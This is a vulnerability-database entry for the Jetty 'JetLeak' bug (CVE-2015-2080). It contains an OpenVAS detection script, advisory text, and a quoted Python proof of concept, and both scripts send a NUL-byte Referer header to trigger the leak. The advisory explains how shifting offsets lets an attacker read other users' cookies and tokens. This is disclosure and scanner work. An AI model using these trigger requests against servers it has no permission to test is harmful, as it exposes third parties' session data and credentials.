Jetty Shared Buffers Information Leakage Vulnerability
2015-03-02T00:00:00
ID OPENVAS:1361412562310805051 Type openvas Reporter Copyright (C) 2015 Greenbone Networks GmbH Modified 2019-09-26T00:00:00
Description
This host is installed with the Jetty web server and is prone to an information
leakage vulnerability (CVE-2015-2080, "JetLeak").
###############################################################################
# OpenVAS Vulnerability Test
#
# Jetty Shared Buffers Information Leakage Vulnerability
#
# Authors:
# Antu Sanadi <santu@secpod.com>
#
# Copyright:
# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# Product CPE this VT is bound to. It has to match the CPE under which the
# detection VT declared in script_dependencies() (gb_jetty_detect.nasl) is
# expected to register Jetty, because get_app_port()/get_app_location() below
# look the target up by exactly this string.
CPE = "cpe:/a:eclipse:jetty";
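# Registration/description phase: runs when the scanner loads the VT and only
# declares metadata; no network traffic is generated here.
if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.805051");
  script_cve_id("CVE-2015-2080");
  script_version("2019-09-26T06:54:12+0000");
  script_bugtraq_id(72768);
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_tag(name:"last_modification", value:"2019-09-26 06:54:12 +0000 (Thu, 26 Sep 2019)");
  script_tag(name:"creation_date", value:"2015-03-02 14:50:23 +0530 (Mon, 02 Mar 2015)");

  script_name("Jetty Shared Buffers Information Leakage Vulnerability");

  script_tag(name:"summary", value:"This host is installed with the Jetty web server and is prone to an
  information leakage vulnerability (CVE-2015-2080, 'JetLeak').");

  # The check fingerprints the unpatched error message rather than reading the
  # leaked data; see the comments in the detection part of this VT.
  script_tag(name:"vuldetect", value:"Sends a crafted HTTP POST request carrying a NUL byte in the
  Referer header value and checks whether the HTTP 400 response still uses the unpatched HttpParser
  error message, which contains the parser state together with the contents of a shared buffer.");

  script_tag(name:"insight", value:"When HttpParser encounters an illegal character in an HTTP header
  value it throws an exception whose message becomes the HTTP 400 reason phrase. Before the fix this
  message included the contents of a shared I/O buffer, so roughly 16 bytes of data belonging to
  previous requests or responses of other clients were returned to the sender. By varying the length
  of the illegal input an attacker can move the offset and read further parts of the buffer.");

  script_tag(name:"impact", value:"An unauthenticated remote attacker can read fragments of other
  users' requests and responses handled by the server, e.g. session cookies, authentication or CSRF
  tokens and credentials submitted in POST bodies, which may aid in further attacks.");

  script_tag(name:"affected", value:"Jetty versions 9.2.3 through 9.2.8 and the 9.3.0 milestone/beta releases.");

  script_tag(name:"solution", value:"Upgrade to Jetty 9.2.9.v20150224 or later. Jetty is frequently
  bundled into third-party products and embedded systems; such products need a fixed build from their
  respective vendor.");

  script_tag(name:"solution_type", value:"VendorFix");

  script_tag(name:"qod_type", value:"exploit");

  script_xref(name:"URL", value:"http://seclists.org/fulldisclosure/2015/Mar/12");
  script_xref(name:"URL", value:"http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00075.html");
  script_xref(name:"URL", value:"http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html");
  script_xref(name:"URL", value:"https://github.com/eclipse/jetty.project/blob/master/advisories/2015-02-24-httpparser-error-buffer-bleed.md");

  # ACT_ATTACK: the request is deliberately malformed and will show up in the
  # target's logs as a 400; not suitable for "safe checks" scan policies.
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2015 Greenbone Networks GmbH");
  script_family("Web Servers");
  script_dependencies("gb_jetty_detect.nasl");
  script_mandatory_keys("jetty/detected");
  script_require_ports("Services/www", 8080);

  exit(0);
}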
include("host_details.inc");
include("http_func.inc");
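# ---- Detection --------------------------------------------------------------
# Strategy (same as the GDS jetleak_tester.py referenced in the description):
# send one request with an illegal byte (NUL) in a header value. HttpParser
# rejects it with a 400. Unpatched builds place
#   "Illegal character 0x0 in state=HEADER_VALUE in '...'"
# - the parser state plus the contents of the shared I/O buffer - into the
# reason phrase. The fix in 9.2.9.v20150224 is understood (per the referenced
# upstream advisory) to drop the state/buffer part, so the "in state=" marker
# alone separates vulnerable from patched servers.
#
# Caveat: a reverse proxy or WAF in front of Jetty may reject the malformed
# header itself. A 400 without the marker, or no answer at all, therefore does
# not prove that the backend is patched.

# Only run against a port on which the Jetty detection VT found the product.
if (!port = get_app_port(cpe: CPE))
  exit(0);

if (!get_app_location(cpe: CPE, port: port))
  exit(0);

host = http_host_name(port: port);

# The NUL byte in the Referer value is the trigger; "Content-Length: 0" keeps
# the request otherwise well-formed so that only this one byte is illegal.
req = string("POST / HTTP/1.1\r\n",
             "Host: ", host, "\r\n",
             "Referer: ", raw_string(0x00), "\r\n",
             "Content-Length: 0\r\n\r\n");
res = http_send_recv(port:port, data:req);

# No response (timeout, connection dropped by an intermediary) is inconclusive,
# not a clean result, so do not record a "not vulnerable" outcome for it.
if (!res)
  exit(0);

marker = "Illegal character 0x0 in state=HEADER_VALUE";

if (res =~ "^HTTP/1\.[01] 400" && marker >< res) {
  # Report the status line only up to the marker: whatever follows it is the
  # leaked buffer, which may hold other clients' cookies or tokens and must not
  # be copied into the scan report.
  status = egrep(pattern:"^HTTP/1\.[01] 400", string:res);
  idx = -1;
  if (status) {
    status = chomp(status);
    idx = stridx(status, marker);
  }

  if (idx >= 0)
    evidence = substr(status, 0, idx + strlen(marker) - 1);
  else
    evidence = "HTTP/1.x 400 response containing '" + marker + "'";

  report = 'The server answered a request carrying a NUL byte in a header value with:\n\n' +
           evidence + '\n\n' +
           'An unpatched HttpParser appends the contents of a shared buffer to this ' +
           'message (CVE-2015-2080, "JetLeak"); the leaked bytes are intentionally ' +
           'not included in this report.';
  security_message(port:port, data:report);
  exit(0);
}

# Greenbone convention: the test ran to completion and found nothing.
exit(99);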
{"id": "OPENVAS:1361412562310805051", "type": "openvas", "bulletinFamily": "scanner", "title": "Jetty Shared Buffers Information Leakage Vulnerability", "description": "This host is installed with Jetty webserver and is prone to information\n leakage vulnerability.", "published": "2015-03-02T00:00:00", "modified": "2019-09-26T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805051", "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "references": ["http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00075.html", "http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html", "http://seclists.org/fulldisclosure/2015/Mar/12"], "cvelist": ["CVE-2015-2080"], "lastseen": "2019-09-27T13:18:09", "viewCount": 12, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-2080"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31838", "SECURITYVULNS:VULN:14342", "SECURITYVULNS:DOC:32004"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:8381C100449907A0334DEEC7E23A5C2A", "EXPLOITPACK:FFA957BFC443828CD6A7FF5B6E85B3EA"]}, {"type": "zeroscience", "idList": ["ZSL-2020-5562", "ZSL-2016-5306"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310869526"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156414", "PACKETSTORM:135804", "PACKETSTORM:156387", "PACKETSTORM:130567"]}, {"type": "zdt", "idList": ["1337DAY-ID-25382", "1337DAY-ID-23343"]}, {"type": "github", "idList": ["GHSA-GHGJ-3XQR-6JFM"]}, {"type": "nessus", "idList": ["FEDORA_2015-2673.NASL", "JETTY_CVE-2015-2080.NASL"]}, {"type": "fedora", "idList": ["FEDORA:73DD962CD8C7"]}, {"type": "cisa", "idList": ["CISA:32998D667194BA67A58624AE4C787D0A"]}], "modified": "2019-09-27T13:18:09", "rev": 2}, "score": {"value": 5.2, "vector": "NONE", "modified": "2019-09-27T13:18:09", "rev": 2}, "vulnersScore": 5.2}, "pluginID": "1361412562310805051", 
"sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jetty Shared Buffers Information Leakage Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:eclipse:jetty\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805051\");\n script_cve_id(\"CVE-2015-2080\");\n script_version(\"2019-09-26T06:54:12+0000\");\n script_bugtraq_id(72768);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-09-26 06:54:12 +0000 (Thu, 26 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-03-02 14:50:23 +0530 (Mon, 02 Mar 2015)\");\n\n script_name(\"Jetty Shared Buffers Information Leakage Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Jetty webserver and is prone to information\n leakage vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a special crafted HTTP POST request and check the response.\");\n\n script_tag(name:\"insight\", value:\"The flaw is 
triggered when handling 400 errors in HTTP responses. This may\n allow a remote attacker to gain access to potentially sensitive information in the memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to obtain sensitive\n information that may aid in further attacks.\");\n\n script_tag(name:\"affected\", value:\"Jetty versions 9.2.3 to 9.2.8 and beta releases of 9.3.x.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Jetty 9.2.9.v20150224 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2015/Mar/12\");\n script_xref(name:\"URL\", value:\"http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00075.html\");\n script_xref(name:\"URL\", value:\"http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"gb_jetty_detect.nasl\");\n script_mandatory_keys(\"jetty/detected\");\n script_require_ports(\"Services/www\", 8080);\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!get_app_location(cpe: CPE, port: port))\n exit(0);\n\nhost = http_host_name(port: port);\n\nreq = string(\"POST / HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Referer: \", raw_string(0x00), \"\\r\\n\",\n \"Content-Length: 0\\r\\n\\r\\n\");\nres = http_send_recv(port:port, data:req);\n\nif(res && res =~ \"^HTTP/1\\.[01] 400\" && \"Illegal character 0x0 in state=HEADER_VALUE\" >< res) {\n security_message(port:port);\n exit(0);\n}\n\nexit(99);\n", "naslFamily": "Web Servers"}
{"cve": [{"lastseen": "2020-10-03T12:49:49", "description": "The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-10-07T14:59:00", "title": "CVE-2015-2080", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2080"], "modified": "2019-03-08T11:29:00", "cpe": ["cpe:/a:eclipse:jetty:9.2.8", "cpe:/a:eclipse:jetty:9.2.5", "cpe:/a:eclipse:jetty:9.2.3", "cpe:/a:eclipse:jetty:9.2.4", "cpe:/a:eclipse:jetty:9.2.7", "cpe:/a:eclipse:jetty:9.3.0", "cpe:/a:eclipse:jetty:9.2.6", "cpe:/o:fedoraproject:fedora:22"], "id": "CVE-2015-2080", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2080", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:eclipse:jetty:9.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:eclipse:jetty:9.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:eclipse:jetty:9.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:eclipse:jetty:9.3.0:m0:*:*:*:*:*:*", 
"cpe:2.3:a:eclipse:jetty:9.3.0:m1:*:*:*:*:*:*", "cpe:2.3:a:eclipse:jetty:9.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:*", "cpe:2.3:a:eclipse:jetty:9.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:eclipse:jetty:9.2.7:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:58", "bulletinFamily": "software", "cvelist": ["CVE-2015-2080"], "description": "\r\n\r\nGDS LABS ALERT: CVE-2015-2080\r\nJetLeak Vulnerability Remote Leakage Of Shared Buffers In Jetty Web Server\r\n\r\nSYNOPSIS\r\n========\r\nGotham Digital Science discovered a critical information leakage vulnerability in the Jetty web server that allows an unauthenticated remote attacker to read arbitrary data from previous requests and responses submitted to the server by other users.\r\n\r\nThe vulnerability was made public by the Jetty development team on the 24th of February 2015 and included proof-of-concept exploit code. As a result, GDS Labs recommends upgrading Jetty web server to a version patched against this vulnerability as soon as possible.\r\n\r\n\r\nIMPACT\r\n======\r\nUsing a vulnerable version of the Jetty web server can lead to the compromise of sensitive data including data passed within headers (e.g. cookies, authentication tokens, etc.), as well as data passed in the POST body (e.g. usernames, passwords, authentication tokens, CSRF tokens, PII, etc.) of requests and responses handled by the web server.\r\n\r\nThe root cause of this vulnerability can be traced to exception handling code that returns approximately 16 bytes of data from a shared buffer when illegal characters are submitted in header values to the server. An attacker can exploit this behavior by submitting carefully crafted requests containing variable length strings of illegal characters to trigger the exception and offset into the shared buffer. 
Since the shared buffer contains user submitted data from previous requests, the Jetty server will return specific data chunks from a previous exchange depending on the attacker\u2019s payload offset.\r\n\r\n\r\nARE YOU VULNERABLE?\r\n===================\r\nThis vulnerability affects versions 9.2.3 to 9.2.8. GDS also found that beta releases (including the beta releases of 9.3.x) are vulnerable.\r\n\r\nGDS have created a simple python script that can be used to determine if a Jetty HTTP server is vulnerable. The script code can be downloaded from the GDS Github repository below:\r\n\r\n - https://github.com/GDSSecurity/Jetleak-Testing-Script\r\n\r\nIf running one of the vulnerable Jetty web server versions, Jetty recommends that you upgrade to version 9.2.9.v20150224 immediately. Organizations should also be aware that Jetty might be bundled within third party products. GDS recommends referring to the Jetty Powered website (http://eclipse.org/jetty/powered/) for a non-exhaustive list of products that utilize Jetty. Due to Jetty being a fairly lightweight HTTP server, it is also commonly used by a variety of embedded systems. Organizations should contact any vendors that may be running a Jetty web server in order to determine if their products are vulnerable and when any patches to resolve this vulnerability will be made available.\r\n\r\nWe have encountered cases where development teams use Jetty as a light-weight replacement for app servers such as Tomcat for internal testing. 
Organizations should consider notifying their development teams about the vulnerability and require teams to upgrade any vulnerable versions of Jetty.\r\n\r\nThe latest release of the Jetty HTTP server is available for download at the following locations:\r\n\r\n - Maven - http://central.maven.org/\r\n - Jetty Downloads - http://download.eclipse.org/jetty\r\n\r\n\r\nREFERENCES\r\n==========\r\nA thorough technical analysis of the vulnerability is available on the GDS blog at:\r\n\r\nhttp://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html\r\n\r\nJetty Vulnerability Announcement:\r\n\r\nhttp://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00074.html\r\n\r\nJetty Vulnerability Advisory:\r\n\r\nhttps://github.com/eclipse/jetty.project/blob/master/advisories/2015-02-24-httpparser-error-buffer-bleed.md\r\n\r\n\r\nDISCLOSURE TIMELINE\r\n===================\r\nFeb 19, 2015 - Vulnerability report sent to security@eclipse.org using SendSafely\r\n\r\nFeb 23, 2015 - Jetty team downloads the vulnerability report\r\n\r\nFeb 24, 2015 - Jetty team releases HTTP Server v9.2.9.v20150224 with bug fix and publicly discloses vulnerability with exploit code\r\n\r\nFeb 25, 2015 - GDS publicly discloses vulnerability\r\n\r\n\r\nGDS commends the Jetty development team on their timely response and swift remediation. It should be noted that the decision to publicly disclose the vulnerability was made by the Jetty development team, independent of GDS. GDS\u2019 blog post and vulnerability disclosure was published after it was discovered that Jetty had publicly disclosed the vulnerability.\r\n\r\n\r\nCREDITS\r\n=======\r\nStephen Komal from Gotham Digital Science for discovering the bug.\r\n\r\n\r\nAbout GDS Labs\r\n==============\r\n\r\nSecurity Research & Development is a core focus and competitive advantage for GDS. 
The GDS Labs team has the following primary directives:\r\n\r\n - Assessing cutting-edge technology stacks\r\n\r\n - Improving delivery efficiency through custom tool development\r\n\r\n - Finding & responsibly disclosing vulnerabilities in high value targets\r\n\r\n - Assessing the impact to our clients of high risk, publicly disclosed vulnerabilities\r\n\r\nThe GDS Labs R&D team performs security research, with areas of current focus including mobile application security, embedded systems, and cryptography. GDS also participates in many security related organizations and groups. GDS Labs is a value added service that our clients benefit from on virtually every engagement that we perform.\r\n\r\n\r\nAbout Gotham Digital Science\r\n=======================\r\n\r\nGotham Digital Science (GDS) is a specialist security consulting company focused on helping our clients find, fix, and prevent security bugs in mission critical network infrastructure, web-based software applications, mobile apps and embedded systems. GDS is also committed to contributing to the security and developer communities through sharing knowledge and resources such as blog posts, security tool releases, vulnerability disclosures, sponsoring and presenting at various industry conferences. 
\r\n\r\nFor more information on GDS, please contact info@gdssecurity.com or visit http://www.gdssecurity.com.\r\n\r\n", "edition": 1, "modified": "2015-03-21T00:00:00", "published": "2015-03-21T00:00:00", "id": "SECURITYVULNS:DOC:31838", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31838", "title": "GDS Labs Alert [CVE-2015-2080] - JetLeak Vulnerability: Remote Leakage Of Shared Buffers In Jetty Web Server", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:59", "bulletinFamily": "software", "cvelist": ["CVE-2015-2080"], "description": "Memory buffers content leakage.", "edition": 1, "modified": "2015-03-21T00:00:00", "published": "2015-03-21T00:00:00", "id": "SECURITYVULNS:VULN:14342", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14342", "title": "Jetty information leakage", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:58", "bulletinFamily": "software", "cvelist": ["CVE-2015-2080", "CVE-2014-3451"], "description": "\r\n\r\nIncorrect handling of self signed certificates in OpenFire XMPP Server\r\n\r\n\r\nAffected software: OpenFire XMPP server\r\nAffected versions: 3.9.3 and earlier\r\nVulnerabilities addressed: CVE-2014-3451, CVE-2015-2080\r\n\r\nOpenfire is a real time collaboration (RTC) server licensed under the Open Source Apache License. It uses the widely adopted open protocol for instant messaging, XMPP (also called Jabber). \r\n\r\n\r\nVulnerability details\r\n\r\nThe OpenFire server would incorrectly accept self signed certificates potentially allowing spoofing attacks.\r\n\r\nThis issue (CVE-2014-3451) is fixed in release 3.10 (OF-405). 
\r\n\r\nWe would like to thank Kim Alvefur for reporting this issue.\r\n\r\n\r\nNotes on release\r\n\r\nThe 3.10 release of OpenFire also addresses a reflected XSS issue (OF-845), and upgrades the Jetty library used (addressing CVE-2015-2080).\r\n\r\n\r\nRelease announcement (includes link to download and SHA1 checksums)\r\n\r\nhttps://community.igniterealtime.org/blogs/ignite/2015/04/22/openfire-3100-released\r\n\r\n\r\n\r\nSimon Waters\r\nphone +448454681066\r\nemail simon.waters@surevine.com\r\nskype simon.waters.surevine\r\n\r\n\r\nParticipate | Collaborate | Innovate\r\n\r\nSurevine Limited, registered in England and Wales with number 06726289. Mailing Address : PO Box 1136, Guildford GU1 9ND\r\nIf you think you have received this message in error, please notify us.\r\n\r\n", "edition": 1, "modified": "2015-05-05T00:00:00", "published": "2015-05-05T00:00:00", "id": "SECURITYVULNS:DOC:32004", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32004", "title": "Incorrect handling of self signed certificates in OpenFire XMPP Server", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "zdt": [{"lastseen": "2018-03-01T17:32:50", "description": "Gotham Digital Science discovered a critical information leakage vulnerability in the Jetty web server that allows an unauthenticated remote attacker to read arbitrary data from previous requests and responses submitted to the server by other users. Jetty versions 9.2.3 through 9.2.8 are affected. 
Proof of concept code included.", "edition": 2, "published": "2015-03-03T00:00:00", "type": "zdt", "title": "Jetty 9.2.8 Shared Buffer Leakage Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2080"], "modified": "2015-03-03T00:00:00", "id": "1337DAY-ID-23343", "href": "https://0day.today/exploit/description/23343", "sourceData": "GDS LABS ALERT: CVE-2015-2080\r\nJetLeak Vulnerability Remote Leakage Of Shared Buffers In Jetty Web Server\r\n\r\nSYNOPSIS\r\n========\r\nGotham Digital Science discovered a critical information leakage vulnerability in the Jetty web server that allows an unauthenticated remote attacker to read arbitrary data from previous requests and responses submitted to the server by other users.\r\n\r\nThe vulnerability was made public by the Jetty development team on the 24th of February 2015 and included proof-of-concept exploit code. As a result, GDS Labs recommends upgrading Jetty web server to a version patched against this vulnerability as soon as possible.\r\n\r\n\r\nIMPACT\r\n======\r\nUsing a vulnerable version of the Jetty web server can lead to the compromise of sensitive data including data passed within headers (e.g. cookies, authentication tokens, etc.), as well as data passed in the POST body (e.g. usernames, passwords, authentication tokens, CSRF tokens, PII, etc.) of requests and responses handled by the web server.\r\n\r\nThe root cause of this vulnerability can be traced to exception handling code that returns approximately 16 bytes of data from a shared buffer when illegal characters are submitted in header values to the server. An attacker can exploit this behavior by submitting carefully crafted requests containing variable length strings of illegal characters to trigger the exception and offset into the shared buffer. 
Since the shared buffer contains user submitted data from previous requests, the Jetty server will return specific data chunks from a previous exchange depending on the attacker\u2019s payload offset.\r\n\r\n\r\nARE YOU VULNERABLE?\r\n===================\r\nThis vulnerability affects versions 9.2.3 to 9.2.8. GDS also found that beta releases (including the beta releases of 9.3.x) are vulnerable.\r\n\r\nGDS have created a simple python script that can be used to determine if a Jetty HTTP server is vulnerable. The script code can be downloaded from the GDS Github repository below:\r\n\r\n - https://github.com/GDSSecurity/Jetleak-Testing-Script\r\n\r\nIf running one of the vulnerable Jetty web server versions, Jetty recommends that you upgrade to version 9.2.9.v20150224 immediately. Organizations should also be aware that Jetty might be bundled within third party products. GDS recommends referring to the Jetty Powered website (http://eclipse.org/jetty/powered/) for a non-exhaustive list of products that utilize Jetty. Due to Jetty being a fairly lightweight HTTP server, it is also commonly used by a variety of embedded systems. Organizations should contact any vendors that may be running a Jetty web server in order to determine if their products are vulnerable and when any patches to resolve this vulnerability will be made available.\r\n\r\nWe have encountered cases where development teams use Jetty as a light-weight replacement for app servers such as Tomcat for internal testing. 
Organizations should consider notifying their development teams about the vulnerability and require teams to upgrade any vulnerable versions of Jetty.\r\n\r\nThe latest release of the Jetty HTTP server is available for download at the following locations:\r\n\r\n - Maven - http://central.maven.org/\r\n - Jetty Downloads - http://download.eclipse.org/jetty\r\n\r\n\r\nREFERENCES\r\n==========\r\nA thorough technical analysis of the vulnerability is available on the GDS blog at:\r\n\r\nhttp://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html\r\n\r\nJetty Vulnerability Announcement:\r\n\r\nhttp://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00074.html\r\n\r\nJetty Vulnerability Advisory:\r\n\r\nhttps://github.com/eclipse/jetty.project/blob/master/advisories/2015-02-24-httpparser-error-buffer-bleed.md\r\n\r\n\r\nDISCLOSURE TIMELINE\r\n===================\r\nFeb 19, 2015 - Vulnerability report sent to [email\u00a0protected] using SendSafely\r\n\r\nFeb 23, 2015 - Jetty team downloads the vulnerability report\r\n\r\nFeb 24, 2015 - Jetty team releases HTTP Server v9.2.9.v20150224 with bug fix and publicly discloses vulnerability with exploit code\r\n\r\nFeb 25, 2015 - GDS publicly discloses vulnerability\r\n\r\n\r\nGDS commends the Jetty development team on their timely response and swift remediation. It should be noted that the decision to publicly disclose the vulnerability was made by the Jetty development team, independent of GDS. GDS\u2019 blog post and vulnerability disclosure was published after it was discovered that Jetty had publicly disclosed the vulnerability.\r\n\r\n\r\nCREDITS\r\n=======\r\nStephen Komal from Gotham Digital Science for discovering the bug.\r\n\r\n\r\nAbout GDS Labs\r\n==============\r\n\r\nSecurity Research & Development is a core focus and competitive advantage for GDS. 
The GDS Labs team has the following primary directives:\r\n\r\n - Assessing cutting-edge technology stacks\r\n\r\n - Improving delivery efficiency through custom tool development\r\n\r\n - Finding & responsibly disclosing vulnerabilities in high value targets\r\n\r\n - Assessing the impact to our clients of high risk, publicly disclosed vulnerabilities\r\n\r\nThe GDS Labs R&D team performs security research, with areas of current focus including mobile application security, embedded systems, and cryptography. GDS also participates in many security related organizations and groups. GDS Labs is a value added service that our clients benefit from on virtually every engagement that we perform.\r\n\r\n\r\nAbout Gotham Digital Science\r\n=======================\r\n\r\nGotham Digital Science (GDS) is a specialist security consulting company focused on helping our clients find, fix, and prevent security bugs in mission critical network infrastructure, web-based software applications, mobile apps and embedded systems. GDS is also committed to contributing to the security and developer communities through sharing knowledge and resources such as blog posts, security tool releases, vulnerability disclosures, sponsoring and presenting at various industry conferences. \r\n\r\nFor more information on GDS, please contact [email\u00a0protected] or visit http://www.gdssecurity.com.\r\n\r\n\r\n-----------------------------------\r\njetleak_tester.py proof of concept:\r\n\r\nimport httplib, urllib, ssl, string, sys, getopt\r\nfrom urlparse import urlparse\r\n\r\n'''\r\n\r\nAuthor: Gotham Digital Science\r\n\r\nPurpose: This tool is intended to provide a quick-and-dirty way for organizations to test whether \r\n their Jetty web server versions are vulnerable to JetLeak. Currently, this script does \r\n not handle sites with invalid SSL certs. 
This will be fixed in a future iteration.\r\n\r\n'''\r\n\r\nif len(sys.argv) < 3:\r\n print(\"Usage: jetleak.py [url] [port]\")\r\n sys.exit(1)\r\n\r\nurl = urlparse(sys.argv[1])\r\nif url.scheme == '' and url.netloc == '':\r\n print(\"Error: Invalid URL Entered.\")\r\n sys.exit(1)\r\n\r\nport = sys.argv[2]\r\n\r\nconn = None\r\n\r\nif url.scheme == \"https\":\r\n conn = httplib.HTTPSConnection(url.netloc + \":\" + port)\r\nelif url.scheme == \"http\":\r\n conn = httplib.HTTPConnection(url.netloc + \":\" + port)\r\nelse: \r\n print(\"Error: Only 'http' or 'https' URL Schemes Supported\")\r\n sys.exit(1)\r\n \r\nx = \"\\x00\"\r\nheaders = {\"Referer\": x}\r\nconn.request(\"POST\", \"/\", \"\", headers)\r\nr1 = conn.getresponse()\r\n\r\nif (r1.status == 400 and (\"Illegal character 0x0 in state\" in r1.reason)):\r\n print(\"\\r\\nThis version of Jetty is VULNERABLE to JetLeak!\")\r\nelse:\r\n print(\"\\r\\nThis version of Jetty is NOT vulnerable to JetLeak.\")\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/23343"}, {"lastseen": "2018-03-31T01:23:35", "edition": 2, "description": "Exploit for multiple platform in category remote exploits", "published": "2016-02-17T00:00:00", "type": "zdt", "title": "Inductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers", "bulletinFamily": "exploit", "cvelist": 